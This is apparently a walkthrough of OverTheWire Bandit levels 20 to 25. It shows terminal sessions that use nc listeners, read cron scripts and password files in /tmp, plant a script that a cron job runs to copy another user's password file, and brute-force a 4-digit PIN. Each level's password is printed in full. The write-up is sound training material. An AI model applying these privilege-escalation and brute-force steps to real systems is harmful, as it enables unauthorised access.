Level 20 –> 21
Level credentials
- username : bandit20
- password : VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Level goal
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
Level solution
Okey, following the instructions, the setuid binary makes a connection to localhost on the port that we specify.
Meaning that, first, we will need to setup up a server to listen on that port.
As we have seen earlier, nc allows us to listen for connections over TCP. let’s use it !
1
2
3
#server
bandit20@bandit:~$ nc -nlvp 1337
Listening on 0.0.0.0 1337
Now we need to open another terminal to interact with the server.
*Note: We could have used a single terminal by running the server on the background, but hey as long as its working who cares right?*
1
2
#client
bandit20@bandit:~$ ./suconnect 1337
Now, the server has to send the current password to the client, let’s do it.
1
2
3
4
5
6
#server
bandit20@bandit:~$ nc -nlvp 1337
Listening on 0.0.0.0 1337
Connection received on 127.0.0.1 45020
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq # our password :D
1
2
3
4
#client
bandit20@bandit:~$ ./suconnect 1337
Read: VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Password matches, sending next password
We got our password 😃
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
Level 21 –> 22
Level credentials
- username : bandit21
- password : NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
Level goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
Level solution
Imagine you are the boss of a big company, and you have a lot of tasks to manage. Some tasks need to be done daily, while others only need to be done once a week or once a month. It would be impossible for you to keep track of all these tasks and make sure they are done on time, every time.
That’s where cronjobs come in. You can think of cronjobs as your personal assistant who reminds you to do certain tasks at specific times. Just like your assistant, cronjobs are always working in the background, checking your schedule and making sure everything runs smoothly.
Now in our case, we should look for current cronjobs and inspect them, maybe we can escalate our privileges and get the next password.
We were told to look in /etc/cron.d, let’s do that.
1
2
3
4
5
6
7
8
9
10
11
12
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ ls -lhis
total 36K
67634 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit15_root
76629 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit17_root
76634 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit22
76637 4.0K -rw-r--r-- 1 root root 122 Feb 21 22:03 cronjob_bandit23
76640 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit24
76652 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:03 cronjob_bandit25_root
269 4.0K -rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
76677 4.0K -rwx------ 1 root root 52 Feb 21 22:04 otw-tmp-dir
75621 4.0K -rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
Hmmm, interesting. Since we are at level 21, and want to move on to level 22, let’s look at cronjob_bandit22 and see what it holds for us.
1
2
3
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
Okey, what the heck is that ? Let me explain.
As we discussed earlier, this is a cronjob entry.
At each @reboot, the script /usr/bin/cronjob_bandit22.sh will get executed by the user bandit22. That’s for the first line.
The second line indicates that the same script will be executed each minute * * * * *.
Okey, the next natural thing to do here is to inspect that script.
1
2
3
4
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Using our sherlock skills, the password is clearly being stored under /tmp in a file called t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv.
Let’s read the file’s content.
1
2
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
We got our password 😃
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
Level 22 –> 23
Level credentials
- username : bandit22
- password : WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
Level goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Level solution
If you have passed the previous level and fully grasped the concept, this level should not be that hard.
1
2
3
4
5
6
7
8
9
10
11
12
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls -lhis
total 36K
67634 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit15_root
76629 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit17_root
76634 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit22
76637 4.0K -rw-r--r-- 1 root root 122 Feb 21 22:03 cronjob_bandit23
76640 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit24
76652 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:03 cronjob_bandit25_root
269 4.0K -rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
76677 4.0K -rwx------ 1 root root 52 Feb 21 22:04 otw-tmp-dir
75621 4.0K -rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
Let’s read cronjob_bandit23 content.
1
2
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
Okey, /usr/bin/cronjob_bandit23.sh is being executed by bandit23 every minute on the minute.
1
2
3
4
5
6
7
8
9
10
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
Let’s understand how this script works :
The variable
mynameis assigned the value of the current user’s username, obtained using thewhoamicommand.The variable
mytargetis assigned a unique identifier by taking the string “I am user" (using the value stored in "myname"), hashing it using the md5sum command, and extracting the hash value using the "cut" command. A message is printed to the console indicating that a password file is being copied from “/etc/bandit_pass/
" to "/tmp/ ". The password file for the current user is copied from “/etc/bandit_pass/
" to a file in the "/tmp" directory with a name based on the hash value obtained in step 2.
With that being said, our goal here is to get the filename that has the password. A very simple way of doing that is replicating the value of mytarget but using bandit23 instead of $myname
1
2
3
4
5
bandit22@bandit:/usr/bin$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349 #filename
bandit22@bandit:/usr/bin$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
We got our password 😃
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Level 23 –> 24
Level credentials
- username : bandit23
- password : QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Level goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Level solution
Another cron challenge, let’s follow our routine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls -lhis
total 36K
67634 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit15_root
76629 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:02 cronjob_bandit17_root
76634 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit22
76637 4.0K -rw-r--r-- 1 root root 122 Feb 21 22:03 cronjob_bandit23
76640 4.0K -rw-r--r-- 1 root root 120 Feb 21 22:03 cronjob_bandit24
76652 4.0K -rw-r--r-- 1 root root 62 Feb 21 22:03 cronjob_bandit25_root
269 4.0K -rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
76677 4.0K -rwx------ 1 root root 52 Feb 21 22:04 otw-tmp-dir
75621 4.0K -rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
Another script ? that’s what we like 😃
Now let’s be honest, at first glance this looks intimidating, but it’s nothing to be afraid of. Let’s tackle the script little by little.
Keep in mind that the script is being run automatically every minute by
bandit24, meaning $myname is literallybandit24
The first thing the script does is changing directory to `/var/spool/bandit24/foo.
It then loops through all the files, if the owner of the file is bandit23, it executes it with a timeout of 60s preventing infinite loops.
Finally it removes the script and repeats the operation again for all the existing files.
Well, THE TIME HAS COME, we are going to create a simple script under /var/spool/bandit24/foo.
1
2
3
4
5
6
bandit23@bandit:~$ cd /var/spool/bandit24/
bandit23@bandit:/var/spool/bandit24$ ls -lhisa
total 12K
526632 4.0K dr-xr-x--- 3 bandit24 bandit23 4.0K Feb 21 22:03 .
80928 4.0K drwxr-xr-x 5 root root 4.0K Feb 21 22:03 ..
526633 4.0K drwxrwx-wx 19 root bandit24 4.0K Apr 21 16:27 foo
Notice that we can write and cd to foo, but we cannot read (ls) its content.
1
bandit23@bandit:/var/spool/bandit24$ cd foo/
Our script will simply consist of copying the password to a file we can read.
Open your favorite text editor, which is vim obviously, and write your script.
1
2
3
4
5
6
7
bandit23@bandit:/var/spool/bandit24/foo$ vim myscript
bandit23@bandit:/var/spool/bandit24/foo$ chmod +x myscript
bandit23@bandit:/var/spool/bandit24/foo$ cat myscript
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/yariss
Let’s wait for few seconds, and then check /tmp/yariss content.
1
2
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/yariss
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar # et voila :)
We got our password 😃
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Level 24 –> 25
Level credentials
- username : bandit24
- password : VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Level goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. You do not need to create new connections each time
Level solution
We have been told that a deamon 😈 is listening on port 30002.
Let’s try to connect to it and see what is up.
1
2
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Hmm, let’s experiment with the input a little, see how the server responds.
1
2
3
4
5
6
7
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
efrefdv
Fail! You did not supply enough data. Try again.
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
Okey, What do you think ? Should we go through all of the 10000 combinations by hand? Are you crazy ??
Let me introduce you to bruteforcing.
Bruteforcing is a hacking technique that involves trying every possible combination of characters until a correct password is found. It’s like trying to break into a safe by testing every possible combination of the lock until it clicks open. The problem is that there are usually a lot of possible combinations, so it can take a long time and a lot of computing power to brute force a password successfully.
It is of course an automated process, and that’s what we will be doing.
First, let’s create a bash script that generates all combinations from 0000 up until 9999.
1
2
3
4
5
6
7
8
9
10
11
12
13
bandit24@bandit:~$ rm /tmp/yariss
bandit24@bandit:~$ mkdir /tmp/yariss
bandit24@bandit:~$ cd /tmp/yariss
bandit24@bandit:/tmp/yariss$ vim bruteforce.sh
bandit24@bandit:/tmp/yariss$ chmod +x bruteforce.sh
bandit24@bandit:/tmp/yariss$ cat bruteforce.sh
#!/bin/bash
pass='VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar'
for i in {0000..9999}
do
echo $pass $i
done
Let’s see a sample output of the script.
1
2
3
4
5
6
7
8
9
10
bandit24@bandit:/tmp/yariss$ ./bruteforce.sh | head -4
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0000
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003
bandit24@bandit:/tmp/yariss$ ./bruteforce.sh | tail -4
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9996
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9997
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9998
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
Seems good enough, now we need to feed this as input to nc
1
2
3
4
5
6
7
8
9
10
11
12
bandit24@bandit:/tmp/yariss$ ./bruteforce.sh | nc localhost 30002
...
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Exiting.
We got our password 😃
p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d